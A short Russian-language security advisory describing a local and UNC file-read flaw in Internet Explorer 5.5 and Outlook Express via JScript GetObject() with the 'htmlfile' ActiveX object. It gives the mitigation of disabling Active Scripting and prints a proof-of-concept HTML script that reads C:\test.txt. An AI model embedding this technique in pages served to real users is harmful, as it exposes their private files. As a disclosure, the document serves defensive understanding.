Подвержены ошибке:
IE 5.5, Outlook Express,(вероятно Outlook 😉 - Win98/2000.
Описание:
Internet Explorer 5.5/Outlook Express/(вероятно Outlook,если Active Scripting разрешено) под Windows 98/2000 (предполагается, что все другие версии тоже подвержены ошибке) позволяют читать локальные файлы и UNC файлы удаленно.
Детали:
Проблема содержится в GetObject() JScript функции и в объекте "htmlfile" ActiveX.
Вызов a=GetObject("c:\\test.txt","htmlfile") создает html документ с полным доступом к этому файлу.
Решение проблемы: Запрещаем Active Scripting.
Вот html код:
------getobject1.html--------------------------------
<SCRIPT> alert("Этот скрипт прочитает C:\\TEST.TXT\ Так что создай его"); a=GetObject("c:\\test.txt","htmlfile"); setTimeout("alert(a.body.innerText);",2000); </SCRIPT> |
-----------------------------------------------------
А вот реальная демонстрация
